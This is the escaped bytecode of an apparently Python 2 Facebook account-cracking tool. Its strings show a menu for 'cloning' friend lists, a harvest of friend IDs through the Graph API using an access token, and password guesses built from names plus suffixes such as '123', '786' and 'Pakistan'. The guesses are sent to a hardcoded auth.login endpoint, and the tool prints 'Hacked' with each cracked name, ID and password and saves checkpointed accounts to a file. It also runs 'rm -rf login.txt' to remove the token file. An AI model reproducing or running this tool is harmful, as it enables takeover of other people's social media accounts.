0t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01nO\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n9\x00|\x00\x00d\x05\x00k\x02\x00rj\x00t\x03\x00d\x06\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x07\x00\x83\x01\x00\x01t\x06\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x08\x00\x00\x00Ns#\x00\x00\x00\n\x1b[1;91mChoose an Option>>> \x1b[1;95mR\n\x00\x00\x00s\x18\x00\x00\x00\x1b[1;91mFill in correctlyR4\x00\x00\x00R:\x00\x00\x00s\r\x00\x00\x00Token Removeds\x10\x00\x00\x00rm -rf login.txt(\x07\x00\x00\x00RH\x00\x00\x00Ri\x00\x00\x00t\x05\x00\x00\x00superR!\x00\x00\x00R\x05\x00\x00\x00RB\x00\x00\x00R\x08\x00\x00\x00(\x01\x00\x00\x00Rf\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>Ri\x00\x00\x00\xe7\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\r\x01\n\x02\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x8c\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\n\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtR)\x00\x00\x00s\x14\x00\x00\x00\x1b[1;94mToken invalids\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sB\x00\x00\x00\x1b[1;97m-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-\x1b[1;91m> \x1b[1;91m1.\x1b[1;95mClone From Friend List.sL\x00\x00\x00\x1b[1;97m-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-\x1b[1;91m> \x1b[1;91m2.\x1b[1;95mClone Friend List Public Account.s/\x00\x00\x00\x1b[1;97m-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-\x1b[1;91m> \x1b[1;91m0.\x1b[1;91mBack(\x0b\x00\x00\x00R\x05\x00\x00\x00RB\x00\x00\x00RC\x00\x00\x00Rh\x00\x00\x00R`\x00\x00\x00RF\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R_\x00\x00\x00RG\x00\x00\x00t\x0b\x00\x00\x00pilih_super(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>Rl\x00\x00\x00\xf7\x00\x00\x00s\x1c\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa7\x02\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x8f\x01|\x00\x00d\x04\x00k\x02\x00r\xa2\x00t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHd\x06\x00GHt\x05\x00d\x07\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x08\x00t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x:\x01|\x02\x00d\t\x00\x19D]\x17\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00d\n\x00\x19\x83\x01\x00\x01q\x84\x00Wn\x14\x01|\x00\x00d\x0b\x00k\x02\x00r\x94\x01t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x0c\x00\x83\x01\x00}\x04\x00d\r\x00GHy>\x00t\x06\x00j\x07\x00d\x0e\x00|\x04\x00\x17d\x0f\x00\x17t\x08\x00\x17\x83\x01\x00}\x05\x00t\t\x00j\n\x00|\x05\x00j\x0b\x00\x83\x01\x00}\x06\x00d\x10\x00|\x06\x00d\x11\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r8\x01\x01\x01\x01d\x12\x00GHt\x00\x00d\x13\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xd\x14\x00GHt\x06\x00j\x07\x00d\x0e\x00|\x04\x00\x17d\x15\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00xH\x00|\x02\x00d\t\x00\x19D]\x17\x00}\x07\x00t\x0c\x00j\r\x00|\x07\x00d\n\x00\x19\x83\x01\x00\x01qv\x01Wn"\x00|\x00\x00d\x16\x00k\x02\x00r\xaa\x01t\x10\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x17\x00t\x11\x00t\x12\x00t\x0c\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00d\x18\x00\x83\x01\x00\x01d\x19\x00d\x1a\x00d\x1b\x00g\x03\x00}\x08\x00x0\x00|\x08\x00D](\x00}\t\x00d\x1c\x00|\t\x00\x17Gt\x13\x00j\x14\x00j\x15\x00\x83\x00\x00\x01t\x16\x00j\x17\x00d\x1d\x00\x83\x01\x00\x01q\xeb\x01Wd\x1e\x00GHd\x06\x00GHt\x05\x00d\x1f\x00\x83\x01\x00\x01d\x06\x00GHd \x00\x84\x00\x00}\n\x00t\x18\x00d!\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x19\x00|\n\x00t\x0c\x00\x83\x02\x00\x01d"\x00GHd#\x00GHd$\x00GHd%\x00t\x11\x00t\x12\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17d&\x00\x17t\x11\x00t\x12\x00t\x1b\x00\x83\x01\x00\x83\x01\x00\x17GHd\'\x00GHt\x00\x00d\x13\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01d\x00\x00S((\x00\x00\x00Ns#\x00\x00\x00\n\x1b[1;91mChoose an Option>>> \x1b[1;95mR\n\x00\x00\x00s\x18\x00\x00\x00\x1b[1;91mFill in correctlyR4\x00\x00\x00R%\x00\x00\x00s\xaa\x00\x00\x00\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;91m\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2s\x1d\x00\x00\x00\x1b[1;91mGetting IDs \x1b[1;91m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rd\x00\x00\x00Ra\x00\x00\x00t\x01\x00\x00\x002s2\x00\x00\x00\x1b[1;95m[\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2] \x1b[1;91mEnter ID\x1b[1;95m: \x1b[1;95ms\xa8\x00\x00\x00\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;91m\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x1b\x00\x00\x00\x1b[1;91mName\x1b[1;95m:\x1b[1;95m Rg\x00\x00\x00s\x14\x00\x00\x00\x1b[1;91mID Not Found!s\x1c\x00\x00\x00\n\x1b[1;95m[\x1b[1;91mBack\x1b[1;95m]s\x1c\x00\x00\x00\x1b[1;91mGetting IDs\x1b[1;97m...s\x16\x00\x00\x00/friends?access_token=R:\x00\x00\x00s \x00\x00\x00\x1b[1;95mTotal IDs\x1b[1;91m: \x1b[1;95ms\x1c\x00\x00\x00\x1b[1;91mPlease Wait\x1b[1;94m...s\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s\x16\x00\x00\x00\r\x1b[1;95mCloning\x1b[1;91mg\xf1h\xe3\x88\xb5\xf8\xe4>sr\x00\x00\x00\n\x1b[1;91m\xc2\xab--\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2---\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2Stop Process Press CTRL+Z\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;91m---\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-\xc2\xbbsC\x00\x00\x00 \x1b[1;91m.................\x1b[1;95mCloning Start..\x1b[1;91m............ c\x01\x00\x00\x00\x12\x00\x00\x00\x05\x00\x00\x00S\x00\x00\x00sI\x0b\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00Xy\x10\x0bt\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\x03\x00\x17t\x05\x00\x17\x83\x01\x00}\x02\x00t\x06\x00j\x07\x00|\x02\x00j\x08\x00\x83\x01\x00}\x03\x00|\x03\x00d\x04\x00\x19d\x05\x00\x17}\x04\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x04\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\x10\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\x04\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n*\nd\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00r\x92\x01d\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\x04\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\x04\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\xa8\t|\x03\x00d\x04\x00\x19d\x1b\x00\x17}\n\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\n\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00rG\x02t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\n\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01n\xf3\x08d\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00r\xc9\x02d\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\n\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\n\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01nq\x08|\x03\x00d\x1c\x00\x19d\x1b\x00\x17}\x0b\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0b\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r~\x03t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\x0b\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01n\xbc\x07d\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00r\x00\x04d\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\x0b\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\x0b\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01n:\x07|\x03\x00d\x04\x00\x19d\x1d\x00\x17}\x0c\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0c\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xb5\x04t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\x0c\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01n\x85\x06d\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00r7\x05d\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\x0c\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\x0c\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01n\x03\x06d\x1e\x00}\r\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\r\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xe4\x05t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\r\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01nV\x05d\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00rf\x06d\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\r\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\r\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01n\xd4\x04d\x1f\x00}\x0e\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0e\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\x13\x07t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\x0e\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0e\x00\x17\x83\x01\x00\x01n\'\x04d\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00r\x95\x07d\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\x0e\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\x0e\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0e\x00\x17\x83\x01\x00\x01n\xa5\x03|\x03\x00d\x04\x00\x19d \x00\x17}\x0f\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0f\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00rJ\x08t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\x0f\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0f\x00\x17\x83\x01\x00\x01n\xf0\x02d\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00r\xcc\x08d\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\x0f\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\x0f\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0f\x00\x17\x83\x01\x00\x01nn\x02|\x03\x00d\x1c\x00\x19d!\x00\x17}\x10\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x10\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\x81\tt\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\x10\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\x10\x00\x17\x83\x01\x00\x01n\xb9\x01d\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00r\x03\nd\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\x10\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\x10\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x10\x00\x17\x83\x01\x00\x01n7\x01|\x03\x00d\x04\x00\x19d!\x00\x17}\x11\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x11\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xb8\nt\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00GHd\x0c\x00|\x03\x00d\r\x00\x19\x17GHd\x0e\x00|\x01\x00\x17GHd\x0f\x00|\x11\x00\x17d\x10\x00\x17GHt\x0c\x00j\r\x00|\x01\x00|\x11\x00\x17\x83\x01\x00\x01n\x82\x00d\x11\x00|\x06\x00d\x12\x00\x19k\x06\x00r:\x0bd\x13\x00GHd\x14\x00|\x03\x00d\r\x00\x19\x17GHd\x15\x00|\x01\x00\x17GHd\x16\x00|\x11\x00\x17d\x10\x00\x17GHt\x0e\x00d\x17\x00d\x18\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00d\x19\x00|\x01\x00\x17d\x1a\x00\x17|\x11\x00\x17d\x10\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x11\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S("\x00\x00\x00Nt\x03\x00\x00\x00outs\x1b\x00\x00\x00https://graph.facebook.com/s\x0f\x00\x00\x00/?access_token=t\n\x00\x00\x00first_namet\x04\x00\x00\x001234s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6R@\x00\x00\x00s\x0e\x00\x00\x00?access_token=s!\x00\x00\x00\x1b[1;91m[ \xe2\x9c\x93 ] \x1b[1;92mHacked\xe2\x9b\x94s9\x00\x00\x00\x1b[1;91m[\xe2\x80\xa2\xe2\x8a\xb1\xe2\x9c\xbf\xe2\x8a\xb0\xe2\x80\xa2] \x1b[1;91mName \x1b[1;91m : \x1b[1;91mRg\x00\x00\x00s9\x00\x00\x00\x1b[1;91m[\xe2\x80\xa2\xe2\x8a\xb1\xe2\x9c\xbf\xe2\x8a\xb0\xe2\x80\xa2] \x1b[1;91mID \x1b[1;91m : \x1b[1;91ms9\x00\x00\x00\x1b[1;91m[\xe2\x80\xa2\xe2\x8a\xb1\xe2\x9c\xbf\xe2\x8a\xb0\xe2\x80\xa2] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91ms\x01\x00\x00\x00\ns\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs \x00\x00\x00\x1b[1;93m[ \xe2\x9c\x96 ] \x1b[1;93mCheckpoints9\x00\x00\x00\x1b[1;93m[\xe2\x80\xa2\xe2\x8a\xb1\xe2\x9c\xbf\xe2\x8a\xb0\xe2\x80\xa2] \x1b[1;93mName \x1b[1;93m : \x1b[1;93ms9\x00\x00\x00\x1b[1;93m[\xe2\x80\xa2\xe2\x8a\xb1\xe2\x9c\xbf\xe2\x8a\xb0\xe2\x80\xa2] \x1b[1;93mID \x1b[1;93m : \x1b[1;93ms9\x00\x00\x00\x1b[1;93m[\xe2\x80\xa2\xe2\x8a\xb1\xe2\x9c\xbf\xe2\x8a\xb0\xe2\x80\xa2] \x1b[1;93mPassword \x1b[1;93m: \x1b[1;93ms\x10\x00\x00\x00out/super_cp.txtRe\x00\x00\x00s\x03\x00\x00\x00ID:s\x04\x00\x00\x00 Pw:t\x03\x00\x00\x00123t\t\x00\x00\x00last_namet\x04\x00\x00\x00khant\x06\x00\x00\x00786786t\x08\x00\x00\x00Pakistant\x05\x00\x00\x0012345t\x03\x00\x00\x00786(\x12\x00\x00\x00R\x05\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrorRW\x00\x00\x00RX\x00\x00\x00R`\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00t\x06\x00\x00\x00urllibt\x07\x00\x00\x00urlopent\x04\x00\x00\x00loadt\x03\x00\x00\x00okst\x06\x00\x00\x00appendRC\x00\x00\x00R\x1a\x00\x00\x00R\\\x00\x00\x00t\x08\x00\x00\x00cekpoint(\x12\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userRe\x00\x00\x00R\x11\x00\x00\x00t\x05\x00\x00\x00pass1Rd\x00\x00\x00t\x01\x00\x00\x00qR\x0c\x00\x00\x00R\x1f\x00\x00\x00t\x03\x00\x00\x00cekt\x05\x00\x00\x00pass2t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5t\x05\x00\x00\x00pass6t\x05\x00\x00\x00pass7t\x05\x00\x00\x00pass8t\x05\x00\x00\x00pass9(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x04\x00\x00\x00main9\x01\x00\x00s|\x01\x00\x00\x00\x02\x06\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x1b\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r